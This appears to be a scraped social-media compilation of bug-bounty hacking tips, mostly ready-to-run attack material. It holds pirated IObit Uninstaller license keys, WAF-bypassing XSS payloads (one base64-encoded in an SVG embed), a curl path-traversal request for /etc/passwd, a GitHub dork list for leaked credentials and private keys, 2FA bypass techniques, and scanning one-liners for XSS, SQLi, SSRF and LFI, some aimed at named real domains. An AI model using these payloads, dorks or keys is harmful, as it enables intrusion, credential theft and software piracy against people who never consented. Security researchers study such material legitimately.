Termux All Command [Telegram Group]

IObit Uninstaller Keys > Status: Active ✅ > Version: Pro 13.x > Download: Click Here > 6E25C-21F89-7F62B-D86BC > Expires On: 16 Oct, 2024 > F6741-F743C-7CE93-3C8TC > Expires On: 20 June, 2024 > DB978-6E333-B12DC-7BDTC > Expires On: 14 June, 2024 > 11242-C437D-DE013-6E6TC > Expires On: 30 May, 2024

Encoded XSS bypassed like a charm WAF <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> #XSS #penetrationtest #CYBERSECURITYARMS

Find and detect time based SQLi with ffuf Payloads: https://lnkd.in/dDX9zkN4 Command: ffuf -u "https://HOST/Less-10/?id=FUZZ" -w ~/pentest/SQLi_Sleeps/data.txt -mt ">20000" -enc FUZZ:urlencode -timeout 150 -v Activate to view larger image,

🌟Bug Bounty PoC's🌟 ✅https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x

Top 3 RXSS payloads

'";//><img/src=x onError="${x};alert(1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>

Simple Reflected XSS

1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs

XSS in the .css URL path Original url: "target/lib/css/animated.min.css" XSS Found in: "/lib/css/animated.min'"/>alert(document.domain)<%2fscript>.css"

Some Web Application Penetration testing or Bug Bounty notes :) Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE

🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨 This is how you can send such a request using #curl :

$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET

2FA Bypass Techniques 1. Response manipulation 2. Status code manipulation 3. 2FA code reusability 4. 2FA code leakage 5. Lack of brute-force protection 6. Bypassing 2FA with null or 000000 8. Missing 2FA code integrity validation 9.Handling of Previous Sessions

🔥🔥Github-Dork🚀🚀🔥🔥 Happy Hunting 🔍 api_key 🔍 app_AWS_SECRET_ACCESS_KEY 🔍 app_secret 🔍 authoriztion 🔍 Ldap 🔍 aws_access_key_id 🔍 secret 🔍 bash_history 🔍 bashrc%20password 🔍 beanstalkd 🔍 client secre 🔍 composer 🔍 config 🔍 credentials 🔍 DB_PASSWORD 🔍 dotfiles 🔍 .env file 🔍 .exs file 🔍 extension:json mongolab.com 🔍 extension:pem%20private 🔍 extension:ppk private 🔍 extension:sql mysql dump 🔍 extension:yaml mongolab.com 🔍 .mlab.com password 🔍 mysql 🔍 npmrc%20_auth 🔍 passwd 🔍 passkey 🔍 rds.amazonaws.com password 🔍 s3cfg 🔍 send_key 🔍 token 🔍 filename:.bash_history 🔍 filename:.bash_profile aws 🔍 filename:.bashrc mailchimp 🔍 filename:CCCam.cfg 🔍 filename:config irc_pass 🔍 filename:config.php dbpasswd 🔍 filename:config.json auths 🔍 filename:config.php pass 🔍 filename:config.php dbpasswd 🔍 filename:connections.xml 🔍 filename:.cshrc 🔍 filename:.git-credentials 🔍 filename:.ftpconfig 🔍 filename:.history 🔍 filename:gitlab-recovery-codes.txt 🔍 filename:.htpasswd 🔍 filename:id_rsa 🔍 filename:.netrc password 🔍 FTP 🔍 filename:wp-config.php 🔍 git-credentials 🔍 github_token 🔍 HEROKU_API_KEY language:json 🔍 HEROKU_API_KEY language:shell 🔍 GITHUB_API_TOKEN language:shell 🔍 oauth 🔍 OTP 🔍 databases password 🔍 [WFClient] Password= extension:ica 🔍 xoxa_Jenkins 🔍 security_credentials #bugbountytips #GitHub

Find xss with this automation of the following work 1 subfinder -d indeed.com -o indeed.txt //Find Subdomains 2 httpx -l subdomains.txt -o httpx.txt // Live Subdomains 3 echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints 4 cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints 5 cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates 6 cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS 7 cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters 8 dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS Script https://github.com/dirtycoder0124/xss

XSS Oneliner

echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

Payload for XSS + SQLi + SSTI/CSTI ! '">

When hunting for IDORs during a bug bounty program, consider the following tip: 1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs. Example usage:

python3 waymore.py -i sub.target.com -mode U -xcc

2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search. Example command:

cat result.txt | grep "admin"

3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters. Example usage:

ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200

4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality. Example scenario:

Found path: https://sub.taget.com/promo/offer/1234/details

Brute-force the last 3 digits: 1234

By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.

You can now passively enumerate all endpoints of a website with katana. (No need waybackurls) Example: echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints You can then check the status of these endpoints or filter in order to find new vulnerabilities: Example: echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

A payload that bypasses Cloudflare WAF <img/src=x onError="${x};alert(Hello);">

🕵️‍♂️ Advanced Bug Bounty Tips: Unveiling SSRF, XSS, and LFI 🐞 Are you ready to take your bug bounty hunting to the next level? Today, I'm sharing some advanced techniques to uncover Server-Side Request Forgery (SSRF), Cross-Site Scripting (XSS), and Local File Inclusion (LFI) vulnerabilities using a powerful arsenal of tools: 🔍 XSS Hunt: To find XSS, we're harnessing the power of gf, httpx, waybackurls, qsreplace, and more. Check out this command: cat file.txt | gf xss | grep 'source=' | qsreplace '""><script>confirm(1)</script>' | while read host; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \033[0;31mVulnerable"; done This command scours the target domain for XSS vulnerabilities. 🚀 SSRF Discovery: Now, let's uncover SSRF using findomain, httpx, and more. Here's the command: findomain -t example[.]com -q | httpx -silent -threads 1000 | gau | grep '=' | qsreplace http://YOUR[.]burpcollaborator[.]net This command identifies SSRF potential and sends requests to your collaborator. 🔐 LFI Detection: For LFI, follow this command with findomain, waybackurls, and ffuf: findomain -t example[.]com -q | waybackurls | gf lfi | qsreplace FUZZ | while read url; do ffuf -u $url -mr "root:x" -w ~/wordlist/LFI.txt; done This script uncovers Local File Inclusion vulnerabilities. 🛠️ Make sure to have these tools handy and stay tuned for more exciting bug bounty tips! Let's make the internet safer, one bug at a time. Happy hacking! 💻🐛 ◼️ Join Our WhatsApp Group To Connect With Cyber Warriors and Bug Bounty Hunters -> https://lnkd.in/gaNB69Qb #BugBounty #CyberSecurity #EthicalHacking #InfoSec Activate to view larger image, Image preview

Run 403 Bypass from anywhere Steps: sudo git clone https://lnkd.in/grpRHnWv /opt/4-ZERO-3 sudo chmod +x /opt/4-ZERO-3/403-bypass.sh sudo ln -sf /opt/4-ZERO-3/403-bypass.sh /usr/local/bin/403-bypass 403-bypass -h 403-bypass -u https://lnkd.in/g4t9cuEz --exploit